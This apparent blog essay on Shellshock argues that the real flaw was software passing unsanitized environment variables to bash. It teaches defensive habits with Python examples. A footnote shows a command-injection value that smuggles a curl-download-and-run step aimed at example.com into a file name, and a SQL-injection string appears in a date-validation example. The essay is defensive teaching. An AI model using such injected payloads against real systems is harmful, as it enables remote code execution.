The thing that shocks me about Shellshock isn't that the bug was in bash, or even that it was in bash for 22+ years before being discovered (how old will I be when I last deal with a bug from before my career even started?); it's that so much software that's been used to exploit Shellshock passed environment variables willy-nilly on to a shell in the first place.
I've got nearly every snippet of random code I've written for myself in that entire period, and doing some spot checks, I see that until 1997, I never bothered with any serious checks of external input at all except for assertion-maintaining checks¹ and Perl tainting (which is actually pretty darn good, for pre-1997 state-of-the-art). But that was as much because I was writing things purely for myself and rarely wrote anything that talked to the network as because I wasn't very sophisticated in security practice (I wasn't, but who was?).
Then, suddenly starting in 1997, I never again wrote code that called external code with user input without taking the most paranoid sanity-checking measures. I blanked my environment and rebuilt it safely before making an external call. I always used the multi-argument form of exec calls². I sanitized every input, sometimes twice if the UI and the backend were separable. Once I got in the habit, I just never stopped.
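For the curious, here's a minimal sketch of what that habit looks like in Python — the function name and the exact variables kept are my own illustration, not any particular project's code:

```python
import subprocess

def run_clean(args):
    """Run an external command with a blanked, rebuilt environment.

    Instead of passing along whatever the caller's environment holds,
    start from an empty dict and add back only what the child needs.
    """
    safe_env = {
        "PATH": "/usr/bin:/bin",  # a known-good PATH, not the inherited one
        "LANG": "C",              # predictable locale
    }
    # Multi-argument form: args is a list, so no shell ever re-parses it.
    return subprocess.run(args, env=safe_env, check=True,
                          capture_output=True, text=True)

result = run_clean(["/bin/echo", "hello"])
print(result.stdout.strip())
```

The two habits compose: the rebuilt environment means no attacker-controlled variables reach the child, and the list of arguments means no attacker-controlled string reaches a shell.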
And it became weird not to do it, to the point that when I saw a single-argument exec it just seemed wrong. (In fact, at Google, my code reviewers sometimes admonished me to remove my checks. When you're writing purely internal tools code, such checks are kind of silly when all the possible users of the code already have the access to do whatever they like. It's a bit like the tools you'll sometimes find that require a password, even if you're already running as the superuser. An inconvenient speedbump that doesn't actually increase security in any significant way.)
That all these tools were calling bash with a ream of unsanitized environment variables just pushed through raw seems totally strange to me. The idea of bash needing better security just makes me giggle a bit. Bash is a thing that can run arbitrary commands on your system. That's its purpose. Saying bash needs better security features on the input end seems like saying that a chef's knife needs better child-safety features. You're supposed to keep the thing away from those who would pose a danger if they possessed it, not make it safer for when they do.
Some have called the efforts to patch bash "whack-a-mole". I think that's likely, because bash was never designed to be secure in the first place. Another bad simile: it's like saying the car engine has a fault because, when hotwired, it will run even without a key. Yep, some car engines actually do have an ignition interlock that requires a key, but that's kind of the point: it's for the specific and rare case where the operator of the car is untrusted. Securing bash would only be ultimately useful for the purpose of giving a command line to users you don't trust. There are tailor-made restricted shells for this purpose; I daresay they're better candidates for this kind of thing, too.
—
¹ There's a better name for that, but it escapes me at the moment. Basically, checks of user input that aren't strictly security-related but rather ensure data integrity by accepting only pre-normalized data before passing it through raw. Like, if I expect a date of the form "1996-04-01", my rejecting anything that doesn't look like that happens to reject "1996-04-01'); DROP TABLE USERS;", but that's merely a side effect of trying to reject things like "04/01/1996", which are malformed but not actually security threats.
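A strict check of that sort might look like the following in Python — the names are mine, for illustration:

```python
import re

# Only the one pre-normalized form is accepted: YYYY-MM-DD.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")

def accept_date(s):
    """Accept a date only if it's already in the expected form."""
    if not DATE_RE.match(s):
        raise ValueError("malformed date: %r" % s)
    return s

accept_date("1996-04-01")  # passes through unchanged
# accept_date("04/01/1996")  # rejected: malformed, but harmless
# accept_date("1996-04-01'); DROP TABLE USERS;")  # also rejected, as a side effect
```

Note that the check knows nothing about SQL or shells; the injection attempt is rejected purely because it doesn't look like "four digits, dash, two digits, dash, two digits".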
There's an old adage, Postel's Law, about designing robust distributed systems: "be liberal in what you accept and conservative in what you send". It means that in the example above, I really should have accepted "04/01/1996" and dealt with it, but only pass on "1996-04-01" even if I got the other form. But when you're writing tools for yourself, it's often easiest to be equally conservative in what you accept, since the only one who has to deal with the "stupid code" is the stupid idiot who wrote the stupid code, namely, that stupid idiot you see in the mirror.
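The Postel-style version of the same check would parse liberally but emit only the canonical form. A sketch, with the set of accepted input formats being my own arbitrary choice:

```python
from datetime import datetime

def normalize_date(s):
    """Be liberal in what you accept, conservative in what you send:
    try a few common input forms, but always pass on ISO YYYY-MM-DD."""
    for fmt in ("%Y-%m-%d", "%m/%d/%Y", "%d %b %Y"):
        try:
            return datetime.strptime(s, fmt).strftime("%Y-%m-%d")
        except ValueError:
            continue
    raise ValueError("unrecognized date: %r" % s)

print(normalize_date("04/01/1996"))  # -> 1996-04-01
print(normalize_date("1996-04-01"))  # -> 1996-04-01
```

Anything that fails every format is still rejected, so the injection-blocking side effect survives; you've just widened the set of well-meaning inputs you tolerate.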
² What that means in a nutshell is understandable even if you don't code, provided you've used a command-line shell. In newer languages (Scala, Haskell, etc.) and in very high-level non-shell languages (Perl, Python, Ruby, and so on), you can make calls to external programs (what we call "the exec family", because many of the calls are named exec or something that starts with exec, though the most common one in the VHLLs is called system) in one of two ways: either with a single string that exactly matches what you'd type at a command line, like
system("rm -rf /tmp/tmpdir")
or you can call it with the arguments split up, like:
system("/bin/rm", "-rf", "/tmp/tmpdir")
The two are more or less equivalent above. The latter is more secure, however, once you introduce some external input. Say you name your temp directory after a project name. That would be something like:
system("rm -rf /tmp/tmpdir_" + projectname)
to give you "rm -rf /tmp/tmpdir_myproject" when projectname was "myproject".
But what if what you got was "myproject; curl -O http://example.com/badscript.sh; bash badscript.sh"? In the above, you'd run the equivalent of "rm -rf /tmp/tmpdir_myproject; curl -O http://example.com/badscript.sh; bash badscript.sh", downloading and running some (presumably scary) script.
OTOH, if you use the multi-argument form, you'd do:
system("/bin/rm", "-rf", "/tmp/tmpdir_" + projectname)
which would insist that the rm command treat everything it gets in projectname, once appended to "/tmp/tmpdir_", as a single directory name. It would fail, because presumably there's no directory called "/tmp/tmpdir_myproject; curl -O http://example.com/badscript.sh; bash badscript.sh".
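The difference can be demonstrated harmlessly with Python's subprocess module, substituting echo for rm so nothing gets deleted (the hostile "project name" here is my own contrived example):

```python
import subprocess

projectname = "myproject; echo PWNED"  # a hostile "project name"

# Multi-argument form: the whole string stays one argument to /bin/echo,
# so the embedded "; echo PWNED" is never interpreted by any shell.
safe = subprocess.run(["/bin/echo", "/tmp/tmpdir_" + projectname],
                      capture_output=True, text=True)
print(safe.stdout)    # one line: /tmp/tmpdir_myproject; echo PWNED

# Single-string form (shell=True): a shell re-parses the string, and the
# injected command actually runs.
unsafe = subprocess.run("echo /tmp/tmpdir_" + projectname,
                        shell=True, capture_output=True, text=True)
print(unsafe.stdout)  # two lines: /tmp/tmpdir_myproject, then PWNED
```

In the safe version the semicolon is just a character in a (nonexistent) filename; in the unsafe version it's a command separator, which is exactly the distinction the multi-argument form buys you.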